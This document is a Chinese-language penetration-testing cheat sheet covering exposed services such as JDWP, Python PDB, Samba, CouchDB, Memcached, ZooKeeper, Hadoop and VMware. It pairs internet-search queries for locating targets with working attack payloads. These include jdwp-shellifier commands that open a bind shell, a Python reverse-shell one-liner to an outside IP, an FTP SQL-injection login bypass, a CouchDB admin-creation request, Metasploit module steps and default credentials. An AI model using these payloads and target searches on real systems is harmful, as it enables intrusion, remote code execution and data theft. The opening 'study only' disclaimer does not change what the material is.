本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.
资源
fofa : title=="Apache JMeter Dashboard"
Apache JMeter 是美国阿帕奇(Apache)软件基金会的一套使用 Java 语言编写的用于压力测试和性能测试的开源软件。
CVE-2018-1297 Jmeter RMI 反序列化命令执行漏洞
-
描述
Apache JMeter 2.x 版本和 3.x 版本中存在安全漏洞。攻击者可利用该漏洞获取 JMeterEngine 的访问权限并发送未授权的代码。
-
POC | Payload | exp
Java_RMI
Fofa: app="Oracle-JAVA-RMI"
fofa: protocol="java-rmi"
-
描述
Java RMI, 即 远程方法调用(Remote Method Invocation), 一种用于实现远程过程调用(RPC)(Remote procedure call)的 Java API, 能直接传输序列化后的 Java 对象和分布式垃圾收集
通常开放在 1090 1099 等端口, 由于直接传输 java 对象, 可能存在远程代码执行.
-
指纹
rmiregistry
-
相关文章
-
相关工具
jdwp
-
描述
JDWP 是 Java Debug Wire Protocol 的缩写,在 JPDA(Java Platform Debugger Architecture)中,它定义了调试器(debugger)和被调试的 Java 虚拟机(target vm)之间的通信协议。
与 PHP 的 Xdebug 类似,当其调试端口直接开放在公网上时,很容易被攻击者攻击并且获取系统权限。
-
指纹
JDWP-Handshaketelnet 端口后,输入命令 JDWP-Handshake 如果返回 JDWP-Handshake,证明存在漏洞。jdb -attach IP:PORT
-
相关文章
-
相关工具
- IOActive/jdwp-shellifier
jdwp-shellifier.py -t xx.xx.xx.xx -p 8080 --break-on java.lang.String.indexOf --cmd 'touch /tmp/pwnd' jdwp-shellifier.py -t xx.xx.xx.xx -p 8080 --break-on java.lang.String.indexOf --cmd 'rm -f /var/run/yum.pid' jdwp-shellifier.py -t xx.xx.xx.xx -p 8080 --break-on java.lang.String.indexOf --cmd 'yum install -y nc' jdwp-shellifier.py -t xx.xx.xx.xx -p 8080 --break-on java.lang.String.indexOf --cmd 'ncat -v -l -p 7777 -e /bin/bash' jdwp-shellifier.py -t xx.xx.xx.xx -p 8000 --break-on java.lang.String.indexOf --cmd "bash -c {echo, bash64的payload } | {base64,-d} | {bash,-i}" - Lz1y/jdwp-shellifier - 修改利用方式为通过对 Sleeping 的线程发送单步执行事件,达成断点,从而可以直接获取上下文、执行命令,而不用等待断点被击中。
- IOActive/jdwp-shellifier
Python_PDB
-
相关文章
-
POC | Payload | exp
telnet xxx.xxx.xxx.xxx 4444 1 w !1+1 !import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Python PIL 远程命令执行漏洞(GhostButt)
-
描述
Python 中处理图片的模块 PIL(Pillow),因为其内部调用了 GhostScript 而受到 GhostButt 漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。
-
相关文章
-
POC | Payload | exp
Python PIL/Pillow Remote Shell Command Execution via Ghostscript CVE-2018-16509
-
描述
Google Project Zero 的 Tavis Ormandy 在 Ghostscript 中发现了一堆漏洞,其中一个是 CVE-2018-16509,这个漏洞允许利用 v9.24 之前的 Ghostscript 中的 -dSAFER 旁路,通过处理 PostScript 中失败的还原(grestore)来禁用 LockSafetyParams 并避免无效访问,从而执行任意命令。此漏洞可通过库,如 ImageMagick 或带有 Ghotscript 包装器的编程语言中的图像库(本例中的 PIL/Pillow)实现。
-
POC | Payload | exp
Python unpickle 造成任意命令执行漏洞
-
相关文章
-
POC | Payload | exp
fofa : app="Ruby"
ruby-debug-ide
- 相关文章
fofa : "Aria2"
Aria2 任意文件写入漏洞
-
描述
Aria2 是一个命令行下轻量级、多协议、多来源的下载工具 (支持 HTTP/HTTPS、FTP、BitTorrent、Metalink) ,内建 XML-RPC 和 JSON-RPC 接口.在有权限的情况下,我们可以使用 RPC 接口来操作 aria2 来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞.
-
相关文章
对 Shadowsocks stream ciphers 的重定向攻击
rce
向日葵 rce
- POC | Payload | exp
CNVD-2022-10270 本地权限提升
- POC | Payload | exp
相关文章
Xlight FTP Server < 3.2.1 user 参数 SQL 注入漏洞
-
描述
在执行 ODBC 认证过程中 Xlight FTP Server 没有正确地过滤用户所提交的用户名和口令字段,远程攻击者可以用"OR ‘1’=’1’ ;#"替换用户名绕过认证登录到服务器.
-
POC | Payload | exp
220 Xlight FTP Server 3.2 ready... User (server-4:(none)) : \' OR \'1\'=\'1\' ;# 331 Password required for \' OR \'1\'=\'1\' ;# Password : type anything 230 Login OK ftp>
Serv-U FTP Server 目录遍历漏洞
-
相关文章
-
POC | Payload | exp
ls ../windwos 550 ..... ls ..:/windows 150 .... ... ...
fofa : protocol="nfs"
相关文章
CVE-1999-0554 目标主机 showmount -e 信息泄露
-
POC | Payload | exp
showmount -e <目标ip> mount -t nfs <目标ip>:/opt/applications/xxx_static_data /mnt
-
MSF 模块
use auxiliary/scanner/nfs/nfsmount set rhosts <目标ip> run
fofa : app="rsync"
未授权访问
-
相关文章
-
POC | Payload | exp
apt install rsync -y rsync <目标IP>::
-
MSF 模块
use auxiliary/scanner/rsync/modules_list set rhosts <目标ip> run
Samba 是 Samba 团队开发的一套可使 UNIX 系列的操作系统与微软 Windows 操作系统的 SMB/CIFS 网络协议做连结的自由软件,它支持共享打印机、互相传输资料文件等。
CVE-2015-0240
-
描述
Samba 的 smbd 文件服务器守护进程中的 Netlogon 服务器实现过程中存在安全漏洞,该漏洞源于程序对未初始化的栈指针执行释放操作。远程攻击者可借助特制的 Netlogon 数据包利用该漏洞执行任意代码。以下版本受到影响:Samba 3.5.x 版本和 3.6.25 之前的 3.6.x 版本,4.0.25 之前的 4.0.x 版本,4.1.17 之前的 4.1.x 版本,4.2.0rc5 之前的 4.2.x 版本。
-
相关文章
-
MSF 模块
use auxiliary/scanner/smb/smb_uninit_cred set rhosts [ip] run
CVE-2017-7494
-
描述
Samba 允许连接一个远程的命名管道,并且在连接前会调用
is_known_pipename()函数验证管道名称是否合法.在is_known_pipename()函数中,并没有检查管道名称中的特殊字符,加载了使用该名称的动态链接库.导致攻击者可以构造一个恶意的动态链接库文件,执行任意代码.该漏洞要求的利用条件:
- 拥有共享文件写入权限,如:匿名可写等
- 需要知道共享目录的物理路径
-
影响版本
- Samba:4.6.5:::
- Samba:4.6.3:::
- Samba:4.6.2:::
- Samba:4.6.1:::
- Samba:4.6.0:::
-
相关文章
-
POC | Payload | exp
-
MSF 模块
use exploit/linux/samba/is_known_pipename set rhost [ip] set target 3 run
相关文章
相关工具
- SafeGroceryStore/MDUT - 数据库跨平台利用工具
- Ryze-T/Sylas - 数据库综合利用工具
Apache CouchDB 是一个开源数据库,专注于易用性和成为"完全拥抱 web 的数据库"。它是一个使用JSON作为存储格式,JavaScript 作为查询语言,MapReduce 和 HTTP 作为 API 的 NoSQL 数据库。应用广泛,如 BBC 用在其动态内容展示平台,Credit Suisse 用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web 和应用程序).
shodan : "product:CouchDB" fofa : app="APACHE-CouchDB"
未授权访问漏洞
-
描述
默认会在 5984 端口开放 Restful 的 API 接口,如果使用 SSL 的话就会监听在 6984 端口,用于数据库的管理功能。其 HTTP Server 默认开启时没有进行验证,而且绑定在 0.0.0.0,所有用户均可通过 API 访问导致未授权访问。
在官方配置文档中对 HTTP Server 的配置有 WWW-Authenticate:Set this option to trigger basic-auth popup on unauthorized requests,但是很多用户都没有这么配置,导致漏洞产生。
-
利用
http://[ip]:5984/_utils/curl http://[ip]:5984curl http://[ip]:5984/_config
CVE-2017-12635 垂直权限绕过漏洞
-
描述
CVE-2017-12635 是由于 Erlang 和 JavaScript 对 JSON 解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。
-
影响版本
- 小于 1.7.0 以及 小于 2.1.1
-
POC | Payload | exp
来源 : Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
PUT /_users/org.couchdb.user:vulhub HTTP/1.1 Host: your-ip:5984 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 108 { "type": "user", "name": "vulhub", "roles": ["_admin"], "roles": [], "password": "vulhub" }
CVE-2017-12636 任意命令执行漏洞
-
描述
CVE-2017-12636 是一个任意命令执行漏洞,我们可以通过 config api 修改 couchdb 的配置 query_server,这个配置项在设计、执行 view 的时候将被运行。
-
影响版本
- 小于 1.7.0 以及 小于 2.1.1
-
POC | Payload | exp
InfluxDB 是一个使用 Go 语言编写的开源分布式,支持高并发的时序数据库
fofa : app="influxdata-InfluxDB" fofa : app="InfluxDB-2.0"
未授权访问漏洞
-
相关文章
-
POC | Payload | exp
/debug/vars /debug/requests?seconds=10 /ping 用来检查数据库实例状态和版本号 /query 用来查询数据库数据 /write 用来更改数据库数据
Memcached 是一套常用的 key-value 分布式高速缓存系统
shodan: "product:Memcached" fofa: app="MEMCACHED"
相关文章
未授权访问漏洞
-
描述
由于 Memcached 的安全设计缺陷没有权限控制模块,所以对公网开放的 Memcache 服务很容易被攻击者扫描发现,攻击者无需认证通过命令交互可直接读取 Memcached 中的敏感信息。
-
POC | Payload | exp
telnet [ip] 11211nc -vv [ip] 11211version # 检查 Memcached Server 的当前版本 stats # 查看 memcache 服务状态 stats slabs # 获取 slab 统计信息 stats items # 显示各个 slab 中 item 的数目和存储时长 set aaa 0 10 9 # 存个 aaa 值 # flag → 0 (可以包括键值对的整型参数,客户机使用它存储关于键值对的额外信息) # exptime → 10 (以秒为单位) # bytes → 9 (数据存储的字节数) memcached get aaa # 读这个值
-
MSF 模块
use auxiliary/gather/memcached_extractor
CVE-2016-8704 & CVE-2016-8705 & CVE-2016-8706
-
描述
Memcached 是一个分布式的高速缓存系统,近日研究者发现在其 < 1.4.33 的版本中存在三个整数溢出漏洞(http://blog.talosintel.com/2016/10/memcached-vulnerabilities.html),通过这几个漏洞攻击者可以触发堆溢出进而远程执行任意命令。官方在 11 月 1 日发布了升级公告。
-
相关文章
fofa: app="MongoDB-数据库"
未授权访问
nmap -p 27017 --script mongodb-info x.x.x.x
OrientDB 是英国 Orient 公司一套开源的 NoSQL 数据库管理系统。该系统支持 ACID 事务、快速索引和 SQL 查询等功能。
fofa : app="OrientDB"
CVE-2017-11467
-
描述
OrientDB 2.22 及之前的版本中存在安全漏洞,该漏洞源于程序没有强制执行权限请求。远程攻击者可通过发送特制的请求利用该漏洞执行任意的操作系统命令。
-
相关文章
-
POC | Payload | exp
相关文章
相关工具
- cdk-team/CDK - 为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及 PoC/EXP。集成 Docker/K8s 场景特有的 逃逸、横向移动、持久化利用方式,插件化管理。
- stealthcopter/deepce - Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)
开源靶场/部署工具
- Metarget/metarget - Metarget is a framework providing automatic constructions of vulnerable infrastructures.
git clone https://github.com/brant-ruan/metarget.git cd metarget/ && pip3 install -r requirements.txt ./metarget cnv list ./metarget appv list
检测虚拟机
-
windows
cmd :
systeminfoPowershell :
get-wmiobject win32_computersystem | fl model -
linux
lshw -class system | grep -i VM & grep -i virtual dmesg | grep -i VM & grep -i virtual dmidecode -s system-product-name ls /tmp systemd-detect-virt virt-what ls -alh /.dockerenv cat /proc/1/cgroup
相关文章
shodan : title:"citrix gateway"
fofa : Citrix_Receiver
注意一下 1494 和 2598 端口
默认账号
nsroot/nsroot
citrix/citrix
相关文章
fofa: app="XenMobile-Console"
CVE-2020-8209 - Path Traversal
VMware vSphere,ESXi 和 vCenter 的区别
VMware Inc. 是一家软件公司。它开发了许多产品,尤其是各种云解决方案 。他的云解决方案包括云产品,数据中心产品和桌面产品等。
vSphere 是在数据中心产品下的一套软件。vSphere 类似微软的 Office 办公套件,Office 办公套件包含了许多软件如 Word, Excel, Access 等。和 Office 一样,vSphere 也是一个软件的集合。他包括了 vCenter, ESXi 和 vSphere Client 等。所以,这些软件联合起来就是 vSphere。vSphere 不是一个可以安装使用的软件, 它是一个包含其它组件的集合。ESXi, vSphere client 和 vCeneter 都是 vSphere 的组件。
ESXi 是 vSphere 中最重要的一个组件。ESXi 是从服务器底层来进行虚拟化,它对外提供一个虚拟化服务,所有的虚拟机都运行在 ESXi 服务上面。为了安装,管理和访问这些虚拟机,你需要另外的一个 vSphere 组件,它就是 vSphere client 或 vCenter。
vSphere client 允许管理员通过该软件访问 ESXi 服务并管理虚拟机。vSphere client 安装在客户机上面。vSphere client 被用来连接 ESXi 服务器和管理任务。
vCenter server 它和 vSphere client 很像,但是它和功能更加强大。vCenter server 是安装在 Window 服务器或 Linux 服务器里面。 vCenter server 是一个中心化的管理应用。你可以通过它管理所有的虚拟机和 ESXi 物理机。vSphere client 可以通过访问 vCenter Server 来管理 EXSi 服务器。vCenter server 是一个企业级的产品,有许多企业级的功能,像 vMotion, VMware High Availability, VMware Update Manager 和 VMware Distributed Resource Scheduler(DRS)。你可以方便的通过 vCenter server 克隆存在的虚拟机。
总结 vSphere 是一个产品套件,ESXi 是安装在物理机上面的服务。vSphere Client 安装在客户端的笔记本或 PC 机上面,用来访问 ESXi 服务并安装和管理上面的虚拟机。vCenter Server 安装在了 ESXi 服务器的虚拟机里面。vCenter 也可以安装在单独的物理服务器上面,但是虚拟化不应该更好么? vCenter 服务通常用在有很多 EXSi 服务和许多虚拟机的大规模环境中。vCenter 也可以使用 vSphere client 来管理。所以 vSphere client 可以在小环境中直接管理 ESXi 服务。也可以在大规模的环境中,通过 vCenter 服务间接管理 ESXi 服务。
CVE-2021-21974
-
影响版本
- vmware:esxi:6.5:2::::::
- vmware:esxi:6.5:650 - 6.7:670
-
POC | Payload | exp
CVE-2021-21978 VMware View Planner 远程代码执行漏洞
CVE-2021-21975 SSRF
- POC | Payload | exp
POST /casa/nodes/thumbprints HTTP/1.1 Content-Type: application/json;charset=UTF-8 ["127.0.0.1:443/ui"]
CVE-2021-21983
- POC | Payload | exp
CVE-2020-4006 VMware Workspace ONE Access 命令注入漏洞
-
描述
2020 年 11 月 23 日,VMware 发布安全公告,其多个产品和组件的管理配置器中存在一个命令注入漏洞(CVE-2020-4006),其 CVSS 评分 9.1。具有管理配置器 8443 端口的网络访问权限并拥有管理配置器 admin 帐户和密码的攻击者可以利用此漏洞在系统上执行命令。
漏洞位于 /cfg/ssl/installSelfSignedCertificate TLS 端口 8443 上的 “Appliance Configurator” 服务中的端点中,通过 san 参数在 POST 对端点的请求中指定恶意参数,可以执行任意 shell 命令。请注意该服务可能会重新启动。动作会记录在
/opt/vmware/horizon/workspace/logs/configurator.log文件中。 -
POC | Payload | exp
CVE-2021-22056 ssrf
CVE-2022-22972
- POC | Payload | exp
Hadoop 是一个由 Apache 基金会所开发的分布式系统基础架构。用户可以在不了解分布式底层细节的情况下,开发分布式程序。充分利用集群的威力进行高速运算和存储。
fofa : app="APACHE-hadoop-HttpFS" fofa : app="APACHE-hadoop-ResourceManager" fofa : app="APACHE-hadoop-YARN"
相关文章
未授权访问漏洞
-
描述
由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
-
示例
http://[ip]:8088/ http://[ip]:50070 http://[ip]:50070/dfshealth.jsp http://[ip]:50070/logs/ -
POC | Payload | exp
Hadoop Yarn RPC RCE
-
描述
Hadoop Yarn RPC 未授权访问漏洞存在于 Hadoop Yarn 中负责资源管理和任务调度的 ResourceManager,成因是该组件为用户提供的 RPC 服务默认情况下无需认证即可访问。Hadoop Yarn RPC 未授权访问使得攻击者无需认证即可通过 RPC 通信执行恶意命令。
-
相关文章
-
POC | Payload | exp
- cckuailong/YarnRpcRCE
java -jar YarnRpcUnauth.jar ip:port "touch /tmp/success"
- cckuailong/YarnRpcRCE
Apache Spark 是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行.
fofa : app="APACHE-Spark"
未授权访问漏洞
-
描述
Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。
-
相关文章
-
POC | Payload | exp
SPARK-38631
-
描述
当文件名称被恶意用户控制时,存在通过
Utils.unpack实现任意shell命令注入的风险. -
影响范围
- 3.1.2
- 3.2.1
- 3.3.0
-
相关文章
Apache Zookeeper 是美国阿帕奇(Apache)软件基金会的一个软件项目,它能够为大型分布式计算提供开源的分布式配置服务、同步服务和命名注册等功能。
fofa : app="APACHE-ZooKeeper"
未授权访问漏洞
-
描述
Zookeeper 的默认开放端口是 2181。Zookeeper 安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用 Zookeeper,通过服务器收集敏感信息或者在 Zookeeper 集群内进行破坏(比如:kill 命令)。攻击者能够执行所有只允许由管理员运行的命令。
-
相关文章
-
搭建环境
wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gz tar -xzvf zookeeper-3.4.14.tar.gz cd zookeeper-3.4.14/conf mv zoo_sample.cfg zoo.cfg ../bin/zkServer.sh start ../bin/zkCli.sh -server 127.0.0.1:2181 # 连接 server
-
利用
echo envi|nc [ip] 2181 # 打印有关服务环境的详细信息 echo dump |ncat [ip] 2181 # 列出未完成的会话和临时节点 echo reqs |ncat [ip] 2181 # 列出未完成的请求 echo ruok |ncat [ip] 2181 # 测试服务器是否运行在非错误状态 echo stat |ncat [ip] 2181 # 列出关于性能和连接的客户端的统计信息 ./zkCli.sh -server [ip]:port
CVE-2014-0085 ZooKeeper 信息泄露漏洞
-
描述
Apache Zookeeper 中存在安全漏洞,该漏洞源于程序记录明文 admin 密码。本地攻击者可通过读取日志利用该漏洞获取敏感信息。
-
相关文章
研华 WebAccess 软件是研华物联网应用平台解决方案的核心,为用户提供一个基于 HTML5 技术用户界面,实现跨平台、跨浏览器的数据访问体验。使用 WebAccess 后,用户可以建立一个信息管理平台,同步提高垂直市场管理发展的效率。
fofa : app="ADVANTECH-WebAccess"
CVE-2017-16720 Advantech WebAccess远程命令执行
-
描述
此漏洞允许攻击者使用 RPC 协议通过 TCP 端口 4592 执行远程命令。
通过利用恶意分布式计算环境/远程过程调用(DCERPC),webvrpcs.exe 服务将命令行指令传递给主机, webvrpcs.exe 服务以管理员访问权限运行。版本小于 8.3、8.3.1、8.3.2 仍然存在特定的安全漏洞。
-
相关文章
-
POC | Payload | exp